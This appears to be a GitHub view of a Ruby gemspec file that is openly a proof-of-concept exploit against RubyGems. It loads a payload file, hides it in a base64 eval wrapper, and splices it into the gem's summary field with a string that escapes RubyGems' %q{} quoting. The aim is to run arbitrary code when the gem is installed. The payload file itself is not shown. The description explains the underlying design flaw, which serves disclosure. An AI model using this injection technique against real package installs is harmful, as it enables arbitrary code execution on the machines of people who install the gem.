-
Notifications
You must be signed in to change notification settings - Fork 1
/
rubygems-pwn.gemspec
33 lines (26 loc) · 1.4 KB
/
rubygems-pwn.gemspec
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# -*- encoding: utf-8 -*-
require 'base64'
Gem::Specification.new do |s|
s.name = "rubygems-pwn"
s.version = "0.1.1"
s.authors = ["Postmodern"]
s.email = ["[email protected]"]
s.homepage = "http://github.com/sophsec/rubygems-pwn"
# load the payload
payload = File.read(File.join(File.dirname(__FILE__),'lib','rubygems-pwn','payload.rb'))
embed_code = lambda { |code|
# base64 encode our payload, to hide any special characters
"require('base64');eval(Base64.decode64(#{Base64.encode64(code).inspect}))"
}
escape_code = lambda { |code|
# escape RubyGems Gem::Specification#ruby_code escaping logic which
# simple wraps Strings in "%q{" and "}".
"}; #{code} #"
}
s.description = %q{A Proof of Concept (PoC) exploit for an trivial Security vulnerability in how RubyGems converts YAML-dumped gemspecs, back into Ruby code, when installing RubyGems. This ties into the larger design mistake, of storing installed gemspecs as Ruby code; since evaling Ruby code was faster than loading YAML gemspecs. When handling data, it is safer to store it in a static format (YAML, XML, CSV), instead of executable code.}
# grab the first sentence of the description, and append our escaped code
s.summary = s.description.match(/^[^\.]+/)[0] +
escape_code[embed_code[payload]]
s.files = ['README.rdoc']
s.require_paths = ["lib"]
end